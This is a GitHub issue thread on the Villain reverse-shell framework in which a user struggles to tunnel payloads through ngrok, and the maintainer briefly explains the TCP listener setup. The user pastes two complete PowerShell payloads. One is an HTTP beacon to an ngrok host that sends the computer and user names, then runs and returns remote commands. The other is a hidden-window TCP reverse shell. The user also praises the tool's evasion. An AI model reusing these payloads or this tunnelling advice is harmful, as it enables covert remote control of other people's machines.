Closed CyberGopher closed 1 year ago
t3l3machus
commented
1 year ago This is a TCP reverse shell. In order to make it work with ngrok, you must follow the first example on the video I made, in which I start ngrok in TCP mode, then set a netcat listener and finally, replace the IP and port in the payload with the domain name provided by ngrok and the port that netcan (and ngrok) are set to listen.
CyberGopher
commented
1 year ago I get you sir but there is this trick with ngrok The recent version of ngrok nowadays doesn't give you a link and a particular port, it just give you a domain name that's all
I tried to ping the domain link so l can get the ip of a domain but the ip rotates, it changes every time you ping it
And even trying to access any of those rotating IPs on their port 80 or 443 the domain doesn't resolve
It's a tricky situation here bro
On Wed, 10 May 2023, 10:30 Panagiotis Chartas, @.***> wrote:
Closed #99 https://github.com/t3l3machus/Villain/issues/99 as completed.
— Reply to this email directly, view it on GitHub https://github.com/t3l3machus/Villain/issues/99#event-9208682207, or unsubscribe https://github.com/notifications/unsubscribe-auth/A7XGES5L4Q2DB3ZH7LOJG73XFNG25ANCNFSM6AAAAAAX36B6AU . You are receiving this because you authored the thread.Message ID: @.***>
CyberGopher
commented
1 year ago Hello man
On Wed, 10 May 2023, 20:39 The CyberGopher, @.***> wrote:
I get you sir but there is this trick with ngrok The recent version of ngrok nowadays doesn't give you a link and a particular port, it just give you a domain name that's all
I tried to ping the domain link so l can get the ip of a domain but the ip rotates, it changes every time you ping it
And even trying to access any of those rotating IPs on their port 80 or 443 the domain doesn't resolve
It's a tricky situation here bro
On Wed, 10 May 2023, 10:30 Panagiotis Chartas, @.***> wrote:
Closed #99 https://github.com/t3l3machus/Villain/issues/99 as completed.
— Reply to this email directly, view it on GitHub https://github.com/t3l3machus/Villain/issues/99#event-9208682207, or unsubscribe https://github.com/notifications/unsubscribe-auth/A7XGES5L4Q2DB3ZH7LOJG73XFNG25ANCNFSM6AAAAAAX36B6AU . You are receiving this because you authored the thread.Message ID: @.***>
t3l3machus
commented
1 year ago @CyberGopher I'll check it out soon and get back to you asap, thanks for letting me know
CyberGopher
commented
1 year ago Okay brother
On Sun, 14 May 2023, 21:06 Panagiotis Chartas, @.***> wrote:
@CyberGopher https://github.com/CyberGopher I'll check it out soon and get back to you asap, thanks for letting me know
— Reply to this email directly, view it on GitHub https://github.com/t3l3machus/Villain/issues/99#issuecomment-1546977920, or unsubscribe https://github.com/notifications/unsubscribe-auth/A7XGESYVG42Y7THAATFRJ63XGEUMPANCNFSM6AAAAAAX36B6AU . You are receiving this because you were mentioned.Message ID: @.***>
CyberGopher
commented
1 year ago Hello brother
On Sun, May 14, 2023 at 8:07 PM The CyberGopher @.***> wrote:
Okay brother
On Sun, 14 May 2023, 21:06 Panagiotis Chartas, @.***> wrote:
@CyberGopher https://github.com/CyberGopher I'll check it out soon and get back to you asap, thanks for letting me know
— Reply to this email directly, view it on GitHub https://github.com/t3l3machus/Villain/issues/99#issuecomment-1546977920, or unsubscribe https://github.com/notifications/unsubscribe-auth/A7XGESYVG42Y7THAATFRJ63XGEUMPANCNFSM6AAAAAAX36B6AU . You are receiving this because you were mentioned.Message ID: @.***>
CyberGopher
commented
1 year ago Sir help me out, tried everything l know, but l can manage to make ngrok work with villain
Sample:
$s='da83-77-246-52-187.ngrok-free.app';$i='king'; $p='https://'; $v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/king/$env:COMPUTERNAME/$env:USERNAME -Headers @{"Authorization"=$i;"ngrok-skip-browser-warning"="asd"};while ($true){$c=(Invoke-RestMethod -UsebasicParsing -Uri $p$s/king -Headers @{"Authorization"=$i;"ngrok-skip-browser-warning"="asd"}); if ($c -ne 'None') {$r=Invoke-Expression $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r; $x=Invoke-RestMethod -Uri $p$s/king -Method POST -Headers @{"Authorization"=$i;"ngrok-skip-browser-warning"="asd"} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}}
if you have time, please help
On Thu, May 25, 2023 at 3:59 AM The CyberGopher @.***> wrote:
Hello brother
On Sun, May 14, 2023 at 8:07 PM The CyberGopher @.***> wrote:
Okay brother
On Sun, 14 May 2023, 21:06 Panagiotis Chartas, @.***> wrote:
@CyberGopher https://github.com/CyberGopher I'll check it out soon and get back to you asap, thanks for letting me know
— Reply to this email directly, view it on GitHub https://github.com/t3l3machus/Villain/issues/99#issuecomment-1546977920, or unsubscribe https://github.com/notifications/unsubscribe-auth/A7XGESYVG42Y7THAATFRJ63XGEUMPANCNFSM6AAAAAAX36B6AU . You are receiving this because you were mentioned.Message ID: @.***>
I can't manage to make it work with ngrok sir The implementations you made on your youtube channel https://www.youtube.com/watch?v=ubNUCvFOmwQ , are different with a recent version of villain sir
Start-Process $PSHOME\powershell.exe -ArgumentList {$client = New-Object System.Net.Sockets.TCPClient('192.168.160.4',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()} -WindowStyle Hidden
This type of payload doesn't have a http option so l can put the ngrok-link and use https, and also there is no id of a shell or say "Authorization="$i on this payload so that l can implementation a ngrok-skip-browser-warning and other stuff, l think you get the picture sir
I tried everything l know, but didn't win this situation. So here l am looking for help sir I don't know to you what is the best way to help me out, but l recommend you make another video using this kinda payload or say a recent version of Villan
I appreciate the tool man, You're great, You know what you're doing, l love the way you evade